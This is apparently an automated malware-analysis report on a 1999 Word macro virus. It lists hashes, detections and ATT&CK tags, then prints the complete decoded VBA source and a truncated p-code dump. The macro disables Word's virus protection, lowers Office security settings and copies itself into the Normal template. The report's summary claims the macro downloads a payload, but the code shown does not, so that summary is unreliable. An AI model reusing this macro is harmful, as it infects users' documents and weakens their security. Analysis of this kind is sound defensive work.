Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 955c65af91492775…

MALICIOUS

Office (OLE)

27.5 KB Created: 1999-07-07 18:54:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 3acb6e6373574e3278ceea31f7271c2c SHA-1: f7f4104d11b6fbd84bc77d90c1f647fbf1bf11d2 SHA-256: 955c65af91492775dcb9afcdd7b4250f9c93c620f2019e6cb797327ae8039079
128 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro that is triggered by the Document_Open event. This macro attempts to disable security settings and download a temporary file to the system's TEMP directory. The macro also modifies registry keys related to Office security and attempts to execute a downloaded payload, indicating a downloader or dropper functionality.

Heuristics 4

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5552 bytes
SHA-256: 9105db495f750f0da90f85af594a5f7c0977c992182c5c059784793ac3f6ef24
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Shadow
Private Sub Document_Close()
On Error Resume Next
Options.VirusProtection = (0)
Options.SaveNormalPrompt = (0)
Application.DisplayAlerts = (0)
Application.ScreenUpdating = (0)
Application.EnableCancelKey = (0)
γ = Environ("WINDIR") & ".\TEMP\"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Do While FileLen(γ & System.ProfileString("", "DefaultFileName")) = 0
Randomize: α = "~WR00000.TMP": Mid(α, 4, 1) = Chr(Int((26 * Rnd) + 65)): Mid(α, 8, 1) = Int(Rnd() * 10)
VBProject.VBComponents(1).Export (γ & α)
Open γ & α For Input As #1
For η = 1 To 4: Line Input #1, �: Next: η = ""
Do Until ι = "'�"
Line Input #1, ι
η = η & ι & Chr(13) & Chr(10)
Loop: Close #1
Open γ & α For Output As #1: Print #1, η: Close #1
System.ProfileString("", "DefaultFileName") = α: Loop
Set α = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1)
If α.CodeModule.CountOfLines > 0 Or ActiveDocument.Path = "" Then Exit Sub
α.CodeModule.AddFromFile γ & System.ProfileString("", "DefaultFileName")
α.CodeModule.Replaceline 2, "Private Sub " & IIf(MacroContainer <> NormalTemplate, "Document_Open()", "Document_Close()")
End Sub
'�

' Processing file: /opt/analyzer/scan_staging/cffa595df4794524bb61721372238d9e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3194 bytes
' Line #0:
' 	QuoteRem 0x0000 0x002D "Copyright (C) 1998 by FlyShadow ~^^~ - Shadow"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #4:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #5:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #6:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #7:
' 	LitDI2 0x0000 
' 	Paren 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #8:
' 	LitStr 0x0006 "WINDIR"
' 	ArgsLd Environ 0x0001 
' 	LitStr 0x0007 ".\TEMP\"
' 	Concat 
' 	St γ 
' Line #9:
' 	LitDI4 0x0001 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' 	LitStr 0x0005 "Level"
' 	Ld System 
' 	ArgsMemSt PrivateProfileString 0x0003 
' Line #10:
' 	Ld γ 
' 	LitStr 0x0000 ""
' 	LitStr 0x000F "DefaultFileName"
' 	Ld System 
' 	ArgsMemLd ProfileString 0x0002 
' 	Concat 
' 	ArgsLd FileLen 0x0001 
' 	LitDI2 0x0000 
' 	Eq 
' 	DoWhile 
' Line #11:
' 	ArgsCall Read 0x0000 
' 	BoS 0x0000 
' 	LitStr 0x000C "~WR00000.TMP"
' 	St α 
' 	BoS 0x0000 
' 	LitDI2 0x001A 
' 	Ld Rnd 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0041 
' 	Add 
' 	FnInt 
' 	ArgsLd Chr 0x0001 
' 	Ld α 
' 	LitDI2 0x0004 
' 	LitDI2 0x0001 
' 	Mid 
' 	BoS 0x0000 
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	Ld α 
' 	LitDI2 0x0008 
' 	LitDI2 0x0001 
' 	Mid 
' Line #12:
' 	Ld γ 
' 	Ld α 
' 	Concat 
' 	Paren 
' 	LitDI2 0x0001 
' 	Ld VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	ArgsMemCall Export 0x0001 
' Line #13:
' 	Ld γ 
' 	Ld α 
' 	Concat 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #14:
' 	StartForVariable 
' 	Ld η 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0004 
' 	For 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Ld � 
' 	LineInput 
' 	BoS 0x0000 
' 	StartForVariable 
' 	Next 
' 	BoS 0x0000 
' 	LitStr 0x0000 ""
' 	St η 
' Line #15:
' 	Ld ι 
' 	LitStr 0x0002 "'�"
' 	Eq 
' 	DoUnitil 
' Line #16:
' 	LitDI2 0x0001 
' 	Ld ι 
' 	LineInput 
' Line #17:
' 	Ld η 
' 	Ld ι 
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x000A 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St η 
' Line #18:
' 	Loop 
' 	BoS 0x0000 
' 	LitDI2 0x0001 
' 	Shar
... (truncated)